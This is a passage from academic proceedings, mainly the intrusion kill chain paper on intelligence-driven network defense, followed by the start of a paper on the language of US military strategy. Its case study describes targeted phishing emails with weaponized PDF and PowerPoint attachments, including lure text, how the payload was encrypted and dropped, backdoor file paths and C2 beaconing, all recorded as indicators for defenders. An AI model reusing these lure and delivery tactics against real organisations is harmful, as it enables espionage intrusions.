
Command and Control (C2) - Typically, compromised hosts must beacon outbound to an Internet<br />

controller server to establish a C2 channel. APT malware especially requires manual interaction<br />

rather than conduct activity automatically. Once the C2 channel establishes, intruders have<br />

“hands on the keyboard” access inside the target environment.<br />

Actions on Objectives - Only now, after progressing through the first six phases, can intruders<br />

take actions to achieve their original objectives. Typically, this objective is data exfiltration which<br />

involves collecting, encrypting and extracting information from the victim environment; violations<br />

of data integrity or availability are potential objectives as well. Alternatively, the intruders may only<br />

desire access to the initial victim box for use as a hop point to compromise additional systems<br />

and move laterally inside the network.<br />

3.3 Courses of action<br />

The intrusion kill chain becomes a model for actionable intelligence when defenders align enterprise<br />

defensive capabilities to the specific processes an adversary undertakes to target that enterprise.<br />

116


Eric Hutchins et al.<br />

Defenders can measure the performance as well as the effectiveness of these actions, and plan<br />

investment roadmaps to rectify any capability gaps. Fundamentally, this approach is the essence of<br />

intelligence-driven CND: basing security decisions and measurements on a keen understanding of the<br />

adversary.<br />

Table 1 depicts a course of action matrix using the actions of detect, deny, disrupt, degrade, deceive,<br />

and destroy from DoD information operations (IO) doctrine (U.S. Department of Defense, 2006). This<br />

matrix depicts in the exploitation phase, for example, that host intrusion detection systems (HIDS) can<br />

passively detect exploits, patching denies exploitation altogether, and data execution prevention<br />

(DEP) can disrupt the exploit once it initiates. Illustrating the spectrum of capabilities defenders can<br />

employ, the matrix includes traditional systems like network intrusion detection systems (NIDS) and<br />

firewall access control lists (ACL), system hardening best practices like audit logging, but also vigilant<br />

users themselves who can detect suspicious activity.<br />

Table 1: Courses of action matrix<br />

Here, completeness equates to resiliency, which is the defender’s primary goal when faced with<br />

persistent adversaries that continually adapt their operations over time. The most notable adaptations<br />

are exploits, particularly previously undisclosed “zero-day” exploits. Security vendors call these “zeroday<br />

attacks,” and tout “zero day protection”. This myopic focus fails to appreciate that the exploit is<br />

but one change in a broader process. If intruders deploy a zero-day exploit but reuse observable tools<br />

or infrastructure in other phases, that major improvement is fruitless if the defenders have mitigations<br />

for the repeated indicators. This repetition demonstrates a defensive strategy of complete indicator<br />

utilization achieves resiliency and forces the adversary to make more difficult and comprehensive<br />

adjustments to achieve their objectives. In this way, the defender increases the adversary’s cost of<br />

executing successful intrusions.<br />

Defenders can generate metrics of this resiliency by measuring the performance and effectiveness of<br />

defensive actions against the intruders. Consider an example series of intrusion attempts from a<br />

single APT campaign that occur over a seven month timeframe, shown in Figure 2. For each phase of<br />

the kill chain, a white diamond indicates relevant, but passive, detections were in place at the time of<br />

that month’s intrusion attempt, a black diamond indicates relevant mitigations were in place, and an<br />

empty cell indicates no relevant capabilities were available. After each intrusion, analysts leverage<br />

newly revealed indicators to update their defenses, as shown by the gray arrows. The illustration<br />

shows, foremost, that at last one mitigation was in place for all three intrusion attempts, thus<br />

mitigations were successful. However, it also clearly shows significant differences in each month. In<br />

December, defenders detect the weaponization and block the delivery but uncover a brand new,<br />

117


Eric Hutchins et al.<br />

unmitigated, zero-day exploit in the process. In March, the adversary re-uses the same exploit, but<br />

evolves the weaponization technique and delivery infrastructure, circumventing detection and<br />

rendering those defensive systems ineffective. By June, the defenders updated their capabilities<br />

sufficiently to have detections and mitigations layered from weaponization to C2. By framing metrics<br />

in the context of the kill chain, defenders had the proper perspective of the relative effect of their<br />

defenses against the intrusion attempts and where there were gaps to prioritize remediation.<br />

Figure 2: Illustration of the relative effectiveness of defenses against subsequent intrusion attempts<br />

3.4 Intrusion reconstruction<br />

Kill chain analysis is a guide for analysts to understand what information is, and may be, available for<br />

defensive courses of action. It is a model to analyze the intrusions in a new way. Most detected<br />

intrusions will provide a limited set of attributes about a single phase of an intrusion. Analysts must<br />

still discover many other attributes for each phase to enumerate the maximum set of options for<br />

courses of action. Further, based on detection in a given phase, analysts can assume that prior<br />

phases of the intrusion have already executed successfully.<br />

Only through complete analysis of prior phases, as shown in Figure 3, can actions be taken at those<br />

phases to mitigate future intrusions. If one cannot reproduce the delivery phase of an intrusion, one<br />

cannot hope to act on the delivery phase of subsequent intrusions from the same adversary. The<br />

conventional incident response process initiates after our exploit phase, illustrating the self-fulfilling<br />

prophecy that defenders are inherently disadvantaged and inevitably too late. The inability to fully<br />

reconstruct all intrusion phases prioritizes tools, technologies, and processes to fill this gap.<br />

Figure 3: Late phase detection<br />

Defenders must be able to move their detection and analysis up the kill chain and more importantly to<br />

implement courses of actions across the kill chain. In order for an intrusion to be economical,<br />

adversaries must re-use tools and infrastructure. By completely understanding an intrusion, and<br />

leveraging intelligence on these tools and infrastructure, defenders force an adversary to change<br />

every phase of their intrusion in order to successfully achieve their goals in subsequent intrusions. In<br />

this way, network defenders use the persistence of adversaries’ intrusions against them to achieve a<br />

level of resilience.<br />

118


Eric Hutchins et al.<br />

Equally as important as thorough analysis of successful compromises is synthesis of unsuccessful<br />

intrusions. As defenders collect data on adversaries, they will push detection from the latter phases of<br />

the kill chain into earlier ones. Detection and prevention at pre-compromise phases also necessitates<br />

a response. Defenders must collect as much information on the mitigated intrusion as possible, so<br />

that they may synthesize what might have happened should future intrusions circumvent the currently<br />

effective protections and detections (see Figure 4). For example, if a targeted malicious email is<br />

blocked due to re-use of a known indicator, synthesis of the remaining kill chain might reveal a new<br />

exploit or backdoor contained therein. Without this knowledge, future intrusions, delivered by different<br />

means, may go undetected. If defenders implement countermeasures faster than their known<br />

adversaries evolve, they maintain a tactical advantage.<br />

Figure 4: Earlier phase detection<br />

3.5 Campaign analysis<br />

At a strategic level, analyzing multiple intrusion kill chains over time will identify commonalities and<br />

overlapping indicators. Figure 5 illustrates how highly-dimensional correlation between two intrusions<br />

through multiple kill chain phases can be identified. Through this process, defenders will recognize<br />

and define intrusion campaigns, linking together perhaps years of activity from a particular persistent<br />

threat. The most consistent indicators, the campaigns key indicators, provide centers of gravity for<br />

defenders to prioritize development and use of courses of action. Figure 6 shows how intrusions may<br />

have varying degrees of correlation, but the inflection points where indicators most frequently align<br />

identify these key indicators. These less volatile indicators can be expected to remain consistent,<br />

predicting the characteristics of future intrusions with greater confidence the more frequently they are<br />

observed. In this way, an adversary’s persistence becomes a liability which the defender can leverage<br />

to strengthen its posture.<br />

The principle goal of campaign analysis is to determine the patterns and behaviors of the intruders,<br />

their tactics, techniques, and procedures (TTP), to detect “how” they operate rather than specifically<br />

“what” they do. The defender’s objective is less to positively attribute the identity of the intruders than<br />

to evaluate their capabilities, doctrine, objectives and limitations; intruder attribution, however, may<br />

well be a side product of this level of analysis. As defenders study new intrusion activity, they will<br />

either link it to existing campaigns or perhaps identify a brand new set of behaviors of a theretofore<br />

unknown threat and track it as a new campaign. Defenders can assess their relative defensive<br />

posture on a campaign-by-campaign basis, and based on the assessed risk of each, develop<br />

strategic courses of action to cover any gaps.<br />

Another core objective of campaign analysis is to understand the intruders’ intent. To the extent that<br />

defenders can determine technologies or individuals of interest, they can begin to understand the<br />

adversary’s mission objectives. This necessitates trending intrusions over time to evaluate targeting<br />

patterns and closely examining any data exfiltrated by the intruders. Once again this analysis results<br />

in a roadmap to prioritize highly focused security measures to defend these individuals, networks or<br />

technologies.<br />

4. Case study<br />

To illustrate the benefit of these techniques, a case study observed by the Lockheed Martin Computer<br />

Incident Response Team (LM-CIRT) in March 2009 of three intrusion attempts by an adversary is<br />

considered. Through analysis of the intrusion kill chains and robust indicator maturity, network<br />

defenders successfully detected and mitigated an intrusion leveraging a “zero-day” vulnerability. All<br />

three intrusions leveraged a common APT tactic: targeted malicious email (TME) delivered to a limited<br />

set of individuals, containing a weaponized attachment that installs a backdoor which initiates<br />

outbound communications to a C2 server.<br />

119


Figure 5: Common indicators between intrusions<br />

4.1 Intrusion attempt 1<br />

Eric Hutchins et al.<br />

Figure 6: Campaign key indicators<br />

On March 3, 2009, LM-CIRT detected a suspicious attachment within an email discussing an<br />

upcoming American Institute of Aeronautics and Astronautics (AIAA) conference. The email claimed<br />

to be from an individual who legitimately worked for AIAA, and was directed to only 5 users, each of<br />

whom had received similar TME in the past. Analysts determined the malicious attachment,<br />

tcnom.pdf, would exploit a known, but unpatched, vulnerability in Adobe Acrobat Portable Document<br />

Format (PDF): CVE-2009-0658, documented by Adobe on February 19, 2009 (Adobe, 2009) but not<br />

patched until March 10, 2009. A copy of the email headers and body follow.<br />

Received: (qmail 71864 invoked by uid 60001); Tue, 03 Mar 2009 15:01:19 +0000<br />

Received: from [60.abc.xyz.215] by web53402.mail.re2.yahoo.com via HTTP; Tue,<br />

03 Mar 2009 07:01:18 -0800 (PST)<br />

Date: Tue, 03 Mar 2009 07:01:18 -0800 (PST)<br />

From: Anne E...<br />

Subject: AIAA Technical Committees<br />

To: [REDACTED]<br />

Reply-to: dn...etto@yahoo.com<br />

Message-id: <br />

MIME-version: 1.0<br />

120


Eric Hutchins et al.<br />

X-Mailer: YahooMailWebService/0.7.289.1<br />

Content-type: multipart/mixed;<br />

boundary="Boundary_(ID_Hq9CkDZSoSvBMukCRm7rsg)" X-YMail-OSG:<br />

Please submit one copy (photocopies are acceptable) of this form, and<br />

one copy of nominee’s resume to: AIAA Technical Committee<br />

Nominations,<br />

1801 Alexander Bell Drive, Reston, VA 20191. Fax number is 703/264-<br />

7551. Form can also be submitted via our web site at www.aiaa.org, Inside<br />

AIAA, Technical Committees<br />

Within the weaponized PDF were two other files, a benign PDF and a Portable Executable (PE)<br />

backdoor installation file. These files, in the process of weaponization, were encrypted using a trivial<br />

algorithm with an 8-bit key stored in the exploit shellcode. Upon opening the PDF, shellcode exploiting<br />

CVE-2009-0658 would decrypt the installation binary, place it on disk as C:\Documents and<br />

Settings\[username]\Local Settings\fssm32.exe, and invoke it. The shellcode would also extract the<br />

benign PDF and display it to the user. Analysts discovered that the benign PDF was an identical copy<br />

of one published on the AIAA website at http://www.aiaa.org/pdf/inside/tcnom.pdf, revealing adversary<br />

reconnaissance actions.<br />

The installer fssm32.exe would extract the backdoor components embedded within itself, saving EXE<br />

and HLP files as C:\Program Files\Internet Explorer\IEUpd.exe and IEXPLORE.hlp. Once active, the<br />

backdoor would send heartbeat data to the C2 server 202.abc.xyz.7 via valid HTTP requests. Table 2<br />

articulates the identified, relevant indicators per phase. Due to successful mitigations, the adversary<br />

never took actions on objectives, therefore that phase is marked “N/A.”<br />

Table 2: Intrusion attempt 1 indicators<br />

4.2 Intrusion attempt 2<br />

One day later, another TME intrusion attempt was executed. Analysts would identify substantially<br />

similar characteristics and link this and the previous day’s attempt to a common campaign, but<br />

analysts also noted a number of differences. The repeated characteristics enabled defenders to block<br />

this activity, while the new characteristics provided analysts additional intelligence to build resiliency<br />

with further detection and mitigation courses of action.<br />

Received: (qmail 97721 invoked by uid 60001); 4 Mar 2009 14:35:22 -0000<br />

121


Eric Hutchins et al.<br />

Message-ID: <br />

Received: from [216.abc.xyz.76] by web53411.mail.re2.yahoo.com via HTTP; Wed,<br />

04 Mar 2009 06:35:20 PST<br />

X-Mailer: YahooMailWebService/0.7.289.1<br />

Date: Wed, 4 Mar 2009 06:35:20 -0800 (PST)<br />

From: Anne E... <br />

Reply-To: dn...etto@yahoo.com<br />

Subject: 7th Annual U.S. Missile Defense <strong>Conference</strong><br />

To: [REDACTED]<br />

MIME-Version: 1.0<br />

Content-Type: multipart/mixed; boundary="0-760892832-1236177320=:97248"<br />

Welcome to the 7th Annual U.S. Missile Defense <strong>Conference</strong><br />

The sending email address was common to the March 3 and March 4 activity, but the subject matter,<br />

recipient list, attachment name, and most importantly, the downstream IP address (216.abc.xyz.76)<br />

differed. Analysis of the attached PDF, MDA_Prelim_2.pdf, revealed an identical weaponization<br />

encryption algorithm and key, as well as identical shellcode to exploit the same vulnerability. The PE<br />

installer in the PDF was identical to that used the previous day, and the benign PDF was once again<br />

an identical copy of a file on AIAA’s website<br />

(http://www.aiaa.org/events/missiledefense/MDA_Prelim_09.pdf). The adversary never took actions<br />

towards its objectives, therefore that phase is again marked “N/A.” A summary of indicators from the<br />

first two intrusion attempts is provided in Table 3.<br />

Table 3: Intrusion attempts 1 and 2 indicators<br />

4.3 Intrusion attempt 3<br />

Over two weeks later, on March 23, 2009, a significantly different intrusion was identified due to<br />

indicator overlap, though minimal, with Intrusions 1 and 2. This email contained a PowerPoint file<br />

which exploited a vulnerability that was not, until that moment, known to the vendor or network<br />

defenders. The vulnerability was publicly acknowledged 10 days later by Microsoft as security<br />

advisory 969136 and identified as CVE-2009-0556 (Microsoft, 2009b). Microsoft issued a patch on<br />

May 12, 2009 (Microsoft, 2009a). In this campaign, the adversary made a significant shift in using a<br />

brand new, “zero-day” exploits. Details of the email follow.<br />

Received: (qmail 62698 invoked by uid 1000); Mon, 23 Mar 2009 17:14:22 +0000<br />

122


Eric Hutchins et al.<br />

Received: (qmail 82085 invoked by uid 60001); Mon, 23 Mar 2009 17:14:21 +0000<br />

Received: from [216.abc.xyz.76] by web43406.mail.sp1.yahoo.com via HTTP; Mon,<br />

23 Mar 2009 10:14:21 -0700 (PDT)<br />

Date: Mon, 23 Mar 2009 10:14:21 -0700 (PDT)<br />

From: Ginette C... <br />

Subject: Celebrities Without Makeup<br />

To: [REDACTED]<br />

Message-id: <br />

MIME-version: 1.0<br />

X-Mailer: YahooMailClassic/5.1.20 YahooMailWebService/0.7.289.1<br />

Content-type: multipart/mixed; boundary="Boundary_(ID_DpBDtBoPTQ1DnYXw29L2Ng)"<br />

<br />

This email contained a new sending address, new recipient list, markedly different benign content<br />

displayed to the user (from “missile defense” to “celebrity makeup”), and the malicious PowerPoint<br />

attachment contained a completely new exploit. However, the adversaries used the same<br />

downstream IP address, 216.abc.xyz.76, to connect to the webmail service as they used in Intrusion<br />

2. The PowerPoint file was weaponized using the same algorithm as the previous two intrusions, but<br />

with a different 8-bit key. The PE installer and backdoor were found to be identical to the previous two<br />

intrusions. A summary of indicators from all three intrusions is provided in Table 4.<br />

Table 4: Intrusion attempts 1, 2, and 3 indicators<br />

Leveraging intelligence on adversaries at the first intrusion attempt enabled network defenders to<br />

prevent a known zero-day exploit. With each consecutive intrusion attempt, through complete<br />

analysis, more indicators were discovered. A robust set of courses of action enabled defenders to<br />

mitigate subsequent intrusions upon delivery, even when adversaries deployed a previously-unseen<br />

exploit. Further, through this diligent approach, defenders forced the adversary to avoid all mature<br />

indicators to successfully launch an intrusion from that point forward.<br />

Following conventional incident response methodology may have been effective in managing systems<br />

compromised by these intrusions in environments completely under the control of network defenders.<br />

However, this would not have mitigated the damage done by a compromised mobile asset that moved<br />

out of the protected environment. Additionally, by only focusing on post-compromise effects (those<br />

after the Exploit phase), fewer indicators are available. Simply using a different backdoor and installer<br />

would circumvent available detections and mitigations, enabling adversary success. By preventing<br />

123


Eric Hutchins et al.<br />

compromise in the first place, the resultant risk is reduced in a way unachievable through the<br />

conventional incident response process.<br />

5. Summary<br />

Intelligence-driven computer network defense is a necessity in light of advanced persistent threats. As<br />

conventional, vulnerability-focused processes are insufficient, understanding the threat itself, its<br />

intent, capability, doctrine, and patterns of operation is required to establish resilience. The intrusion<br />

kill chain provides a structure to analyze intrusions, extract indicators and drive defensive courses of<br />

actions. Furthermore, this model prioritizes investment for capability gaps, and serves as a framework<br />

to measure the effectiveness of the defenders’ actions. When defenders consider the threat<br />

component of risk to build resilience against APTs, they can turn the persistence of these actors into a<br />

liability, decreasing the adversary’s likelihood of success with each intrusion attempt.<br />

The kill chain shows an asymmetry between aggressor and defender, any one repeated component<br />

by the aggressor is a liability. Understanding the nature of repetition for given adversaries, be it out of<br />

convenience, personal preference, or ignorance, is an analysis of cost. Modeling the cost-benefit ratio<br />

to intruders is an area for additional research. When that cost-benefit is decidedly imbalanced, it is<br />

perhaps an indicator of information superiority of one group over the other. Models of information<br />

superiority may be valuable for computer network attack and exploitation doctrine development.<br />

Finally, this paper presents an intrusions kill chain model in the context of computer espionage.<br />

Intrusions may represent a broader problem class. This research may strongly overlap with other<br />

disciplines, such as IED countermeasures.<br />

References<br />

Adobe. APSA09-01: Security Updates available for Adobe Reader and Acrobat versions 9 and earlier, February<br />

2009. URL http://www.adobe.com/support/security/advisories/apsa09-01.html.<br />

Duran F, Conrad, S. H, Conrad, G. N, Duggan, D. P and Held E. B. Building A System For Insider Security. IEEE<br />

Security & Privacy, 7(6):30–38, 2009. doi: 10.1109/MSP.2009.111.<br />

Epstein, Keith, and Elgin, Ben. Network Security Breaches Plague NASA, November 2008. URL<br />

http://www.businessweek.com/print/magazine/content/08_48/b4110072404167.htm.<br />

LTC Ashton Hayes. Defending Against the Unknown: Antiterrorism and the Terrorist Planning Cycle. The<br />

Guardian, 10(1):32–36, 2008. URL http://www.jcs.mil/content/files/2009-04/041309155243_ spring2008.pdf.<br />

Krekel, Bryan. Capability of the People’s Republic of China to Conduct Cyber Warfare and Computer Network<br />

Exploitation, October 2009. URL http://www.uscc.gov/researchpapers/2009/NorthropGrumman_<br />

PRC_Cyber_Paper_FINAL_Approved%20Report_16Oct2009.pdf.<br />

Lewis, James Andrew Holistic Approaches to Cybersecurity to Enable Network Centric Operations, April 2008.<br />

URL http://armedservices.house.gov/pdfs/TUTC040108/Lewis_Testimony040108.pdf.<br />

Mandiant. M-Trends: The Advanced Persistent Threat, January 2010. URL<br />

http://www.mandiant.com/products/services/m-trends.<br />

Microsoft. Microsoft Security Bulletin MS09-017: Vulnerabilities in Microsoft Office PowerPoint Could Allow<br />

Remote Code Execution (967340), May 2009a. URL http://www.microsoft.com/technet/security/<br />

bulletin/ms09-017.mspx.<br />

Microsoft. Microsoft Security Advisory (969136): Vulnerability in Microsoft Office PowerPoint Could Allow Remote<br />

Code Execution, April 2009b. URL http://www.microsoft.com/technet/security/advisory/969136.mspx.<br />

Sarandis Mitropoulos, Dimitrios Patsosa, and Christos Douligeris. On Incident Handling and Response: A stateof-the-art<br />

approach. Computers & Security, 5:351–370, July 2006. URL<br />

http://dx.doi.org/10.1016/j.cose.2005.09.006.<br />

National Institute of Standards and Technology. Special Publication 800-61: Computer Security Incident Handling<br />

Guide, March 2008. URL http://csrc.nist.gov/publications/PubsSPs.html.<br />

National Research Council. Countering the Threat of Improvised Explosive Devices: Basic Research<br />

Opportunities (Abbreviated Version), 2007. URL http://books.nap.edu/catalog.php?record_id=11953.<br />

Sakuraba, T. Domyo, S, Chou Bin-Hui and Sakurai, K. Exploring Security Countermeasures along the Attack<br />

Sequence. In Proc. Int. Conf. Information Security and Assurance ISA 2008, pages 427–432, 2008.<br />

doi:10.1109/ISA.2008.112.<br />

Stamos, Alex. “Aurora” Response Recommendations, February 2010. URL https://www.isecpartners.<br />

com/files/iSEC_Aurora_Response_Recommendations.pdf.<br />

Tirpak, John A.. Find, Fix, Track, Target, Engage, Assess. Air Force Magazine, 83:24–29, 2000. URL<br />

http://www.airforce-magazine.com/MagazineArchive/Pages/2000/July%202000/0700find.aspx.<br />

UK-NISCC. National Infrastructure Security Co-ordination Centre: Targeted Trojan Email Attacks, June 2005.<br />

URL https://www.cpni.gov.uk/docs/ttea.pdf.<br />

United States Army Training and Doctrine Command. A Military Guide to Terrorism in the Twenty-First Century,<br />

August 2007. URL http://www.dtic.mil/srch/doc?collection=t3&id=ADA472623.<br />

US-CERT. Technical Cyber Security Alert TA05-189A: Targeted Trojan Email Attacks, July 2005. URL<br />

http://www.us-cert.gov/cas/techalerts/TA05-189A.html.<br />

124


Eric Hutchins et al.<br />

U.S.-China Economic and Security Review Commission. 2008 Report to Congress of the U.S. China Economic<br />

and Security Review Commission, November 2008. URL http://www.uscc.gov/annual_report/2008/<br />

annual_report_full_08.pdf.<br />

U.S.-China Economic and Security Review Commission. 2009 Report to Congress of the U.S.-China Economic<br />

and Security Review Commission, November 2009. URL http://www.uscc.gov/annual_report/2009/<br />

annual_report_full_09.pdf.<br />

U.S. Department of Defense. Joint Publication 3-13 Information Operations, February 2006. URL<br />

http://www.dtic.mil/doctrine/new_pubs/jp3_13.pdf.<br />

U.S. Department of Defense. Joint Publication 3-60 Joint Targeting, April 2007. URL http://www.dtic.<br />

mil/doctrine/new_pubs/jp3_60.pdf.<br />

Willison, Robert and Siponen. Mikko Overcoming the insider: reducing employee computer crime through<br />

Situational Crime Prevention. Communications of the ACM, 52(9):133–137, 2009. doi: http://doi.acm.<br />

org/10.1145/1562164.1562198.<br />

125


The Hidden Grand Narrative of Western Military Policy: A<br />

Linguistic Analysis of American Strategic Communication<br />

Saara Jantunen and Aki-Mauri Huhtinen<br />

National Defence University, Helsinki, Finland<br />

sijantunen@gmail.com<br />

aki.huhtinen@mil.fi<br />

Abstract: War engages civilians in a very different way than is traditionally understood. The military-industrial<br />

complex has rooted itself permanently into the civilian world. In the US, recruiters have long operated in<br />

university campuses, the Pentagon has funded the entertainment industry for decades, and the current trend in<br />

most militaries is to advertise military careers that are less about war and more about individual expertise in<br />

civilian professions. The key place for military recruiting is shopping malls, where teenagers can play war games<br />

and enlist. Strategic communication has replaced information warfare. In a complex world, strategic<br />

communication exploits all possible media. As Art of War has been replaced by science, the representations of<br />

war and the role of the military have changed. Both war and military forces are now associated with binary roles:<br />

destruction and humanity, killing and liberating. The logic behind 'bombing for peace' is encoded in the Grand<br />

Military Narrative. This narrative is hidden in American (and NATO) strategies such as Effects Based Operations,<br />

which rely heavily on technology. As people aim to rationalize the world with technology, they fail to take into<br />

account the uncertainty it brings. In warfare, that uncertainty is verbalized as “friendly fire”, “collateral damage” or<br />

simply as “accident”. Success and failure are up to technology. Technology is no longer a tool, but an ideology<br />

and an actor that not only 'enables' the military to take action, but frees it of responsibility. This article analyzes<br />

American strategy discourse and the standard and trends of rhetoric they create. The article focuses on<br />

pinpointing some of the linguistic choices and discourses that define the so-called 'techno-speak', the product of<br />

modern techno-ideology. These discourses result in representations of techno-centered binary values, which<br />

steer military strategy and foreign policy.<br />

Keywords: military-industrial complex, revolution in military affairs, effects based operations, discourse analysis,<br />

military technology<br />

1. The grand military narrative<br />

"You want to hit only the guy you want, not the school bus three cars back", says Steve Felix of the<br />

Naval Air Warfare Center (Matthews, 2010). "The bad guys are figuring out how to hide out in homes<br />

and near schools. We can't go in and drop large bombs - that just doesn't work any more", explains<br />

Steve Martin, the representative of Lockheed Martin. Raytheon's Griffin, currently deployed in<br />

Predator drones, is a new, lighter and more precise missile type. "The Griffin's maneuverability and<br />

accuracy reduce the risk of "collateral damage"' says an Army representative. "When you can start<br />

producing a lower ratio of collateral damage, that's how you win this kind of war", notes Anthony<br />

Cordesman from Strategy at the Center for Strategic and International Studies (Wichner, 2010). No<br />

more 'enemy', but virtuous precision to rid the world of the "bad guys".<br />

In July 2010, the Army Experience Center (AEC) in a Philadelphia mall was getting ready to close its<br />

door after a successful project. The Center offered visitors information on military careers as well as<br />

video games and simulators (some of which are used to train the troops). The traditional images of<br />

depressing boot camp physical training disappear once the teenagers (13 and older, according to the<br />

AEC) get to show with combat simulators what they have been practicing most of their lives. The<br />

youth, wandering the malls, are the perfect target for recruiters. Because they know gaming, warfare<br />

has to become game-like. Now, entertainment industry is replacing boot camps. Being good at war is<br />

made easy. Being good at war is about pressing a button: In the Army Experience Center, the<br />

teenagers can "touch and feel and experience what the army is all about", explains one of the<br />

Center's recruiters (thearmyexperience, 2008). High-tech weapons to kill the "bad guys" from a<br />

comfortable distance and virtual simulation create combat experience: What ever the problem, the<br />

answer lies in technology. This is the Grand Military Narrative.<br />

2. The military-industrial-complex and revolution in military affairs<br />

The military-industrial complex gave birth to the Revolution in Military Affairs. The future of the military<br />

is computers, information networks, and precision-guided munitions (Toffler, 1981, 1993).<br />

Technological advances are used to solve the military and strategic challenges of the U.S. (Shimko,<br />

2010: 213). This revolution, or evolution, is depicted by the Grand Military Narrative.<br />

126


Saara Jantunen and Aki-Mauri Huhtinen<br />

RMA's focus on technology has led to technology-centered strategies and doctrines. Technology<br />

offers the option of unmanned war, to “bring knowledge forward” for the people whose observation is<br />

limited (Rantapelkonen, 2006:72). “Maximizing output” and “minimizing input” (citing Lyotard, 1984 in<br />

Rantapelkonen, 2006:73) match the American ideal of “easy living”. Lyotard argues that technology is<br />

“good” because it is efficient, not because it is “true”, “just” or “beautiful”.<br />

According to Rantapelkonen (2006), 'war on terror' is technologically driven. However, the binary<br />

image of war contains the idea of not only destroying and devastating, but also avoiding risk, threat<br />

and death by liberating, helping and building. Der Derian (2008) calls this "virtuous war". He argues<br />

that the military-industrial complex needs binary rhetoric such as 'bombing for peace' and 'killing to<br />

live' in order to operate and make profit: Technology is in service of virtue. As death and destruction<br />

are no longer accepted, technology steps in. By replacing the soldier with a precision (fire-and-forget)<br />

weapon, 'targets can be hit' and 'operations conducted' without causing protests on the home front.<br />

The evolution of warfare demands science is in the service of war. Technology “enables us to do a lot<br />

more stuff” and to “more effectively prosecute those operations” (U.S. Department of Defense, 2003).<br />

Because of its efficiency and speed, strategies, doctrines and even foreign policy rely on the sole use<br />

of technology. The Powell Doctrine aimed to solve problems by overwhelming force in the form of<br />

superior weapons technology. Shock and Awe in 2003 worked much the same way.<br />

However, the modern narratives and threat descriptions do not, after all, change much. President<br />

Obama no longer uses the term "war on terrorism", but this choice of term did not change the warfare<br />

in Afghanistan or Iraq. The US, China, Russia, India, Pakistan, Israel and North Korea are still<br />

developing nuclear weapons. The new threat descriptions have not removed the old threats. Despite<br />

precision munitions, B52 bombers are still in use. The real change first takes place in discourse, but<br />

lags behind in realization.<br />

The Grand Military Narrative contains a techno-ideology, which is encoded in language. In this<br />

Narrative war has two aspects: the "how" and "why". How wars are conducted is a matter of<br />

technology descriptions. Why wars are fought is a matter of value systems. The merge of these two<br />

aspects create what is now known as strategic communication.<br />

3. From information warfare to strategic communication<br />

Not only has the language of the press-briefings, but also soldier-to-soldier communication changed.<br />

In the battle field and combat, propaganda has been replaced by strategic and psychological<br />

influence. The global and social media create an increasing influence and new technology solutions<br />

create an opportunity to make an impact. Strategic communication exploits all these.<br />

The new generation's war, the Gulf War, was a catalyst to public discussion on the new wave of<br />

Information Operations. The Kosovo War and 9/11 sped up the discussion. A whole new narrative<br />

was created during the 'War Against Terrorism'.<br />

According to Taylor (2003), the concepts of political, psychological or information warfare are<br />

outdated. Instead, we use the concept of 'strategic communication'. Taylor recognizes three types of<br />

it. First is “public diplomacy”, referring to state and political level. Second is “public affairs”, which<br />

contains the global media. The third type, Information operations (Info Ops), deals with military<br />

capability. Strategic communication has abandoned the Cold War era categories of propaganda: the<br />

so called “black” (covert), “white” (overt) and “grey” (unknown) propaganda. Today, the speed of<br />

communication is enough to disturb our perception management capability. The 24/7 model takes<br />

advantage of our values and understanding of democracy: we say no to censorship and want all<br />

information to be available at all times, everywhere.<br />

Strategic communication is a child of the complex world. Instead of rational knowledge, we have<br />

information flow. Planning and execution are parallel processes; Speed dictates the operational<br />

modes, and strategic communication is an attempt to control all this.<br />

4. The question of responsibility: Effects Based Operations<br />

Effects Based Operations (EBO), is a US military concept and doctrine that stands for "operations that<br />

are planned, executed, assessed, and adapted based on a holistic understanding of the operational<br />

environment in order to influence or change system behaviour or capabilities using the integrated<br />

127


Saara Jantunen and Aki-Mauri Huhtinen<br />

application of select instruments of power to achieve directed policy aims". On the day of "Shock and<br />

Awe" in 2003, Colonel Gary L. Crowder, chief of strategy, concepts and doctrine, elaborated the<br />

concept in layperson's terms in a press briefing dedicated for EBO alone (U.S. Department of<br />

Defense, 2003). Before proceeding to explaining any further, the concepts of technology-based<br />

approach and doctrine step in. Crowder explains that the new approach was "more than just people, it<br />

was the combination of a fortuitous development of different capabilities and technologies [...] that<br />

enabled us to do that." The phrases that follow this capture the very essence of the discourse that<br />

characterized the American Public Relations during the beginning of the war:<br />

[...] what we wanted to do was in fact to achieve some sort of policy objective, and that<br />

you could, in fact, craft military operations to better achieve those policy operations in a<br />

more efficient and effective manner.<br />

The key words here are "efficient" and "effective". EBO was, according to Crowder, a way to mitigate<br />

collateral damage. In order to explain the concepts of "collateral damage" and "unintended damage",<br />

Crowder had to discuss risk-taking as part of doctrine.<br />

Crowder explains that even if collateral and unintended damage happen, and "both of these types of<br />

damage will take place", they "still went through a methodical process". This precisely is the problem<br />

with strategy that relies almost solely on the performance of technology. Technology fails, and when it<br />

does, the responsibility of that failure lies on technology itself. According to the strategy, both<br />

collateral and unintended damage are unavoidable, technology has its fail-ratio, and these are facts<br />

that just have to be accepted. In Virilio's (1989: 8-9) terms, Art of War has turned into Science of the<br />

Accident.<br />

Technology is complex and when techno-speak enters press-briefings such as Crowder's, a new kind<br />

of language is created. Zizek (2009) argues that public communication increasingly applies expert<br />

and scientific jargon that no longer translates to the 'common speak' of the society. The 'expert<br />

speak', despite its abstract nature, still shapes our thinking, especially when it is labeled with<br />

adjectives such as 'precision', 'smart' and 'efficiency'. With examples of virtuous warring (liberating)<br />

and precise and efficient operating models (avoiding collateral damage), it complies with the modern<br />

imperative of clean and safe, effective and lethal, and yet moral and humane war fighting. The kind of<br />

war that we will accept.<br />

Although EBO as it was first created and intended is already abandoned by the American Department<br />

of Defense, it created a new narrative tradition of virtue and the superiority of technology and binary<br />

values. This tradition continues to influence Western military discourses. This will be discussed in<br />

Chapter 5.<br />

5. The grand military narrative: Analysis<br />

In order to pinpoint the Grand Military Narrative of strategic communication, we have to look at the<br />

theme and structures of the strategists' language. The United States has an irrefutable position as the<br />

military trend-setter and the creator of new military concepts. This makes American strategy papers<br />

and press briefings on strategy and doctrine a good resource for analyzing the evolution of strategic<br />

communication. The upcoming sections continue the discussion on strategy, doctrine and Effects<br />

Based Operations and their influence on discourse.<br />

The Joint Operating Environment 2010 (JOE10) (United States Joint Forces Command, 2010)<br />

provides the framework for our analysis and aims to predict and forecast the future of American<br />

warfare. It argues and elaborates on what should be prepared for. The narrative starts from the<br />

recognition of the human limitations in the complex world, created by the clash of different ideologies<br />

and cultures, and further supplemented by advances in technology and changes in the economy.<br />

The complex world affects, according to the report, the "battle of narratives". If winning the battle is<br />

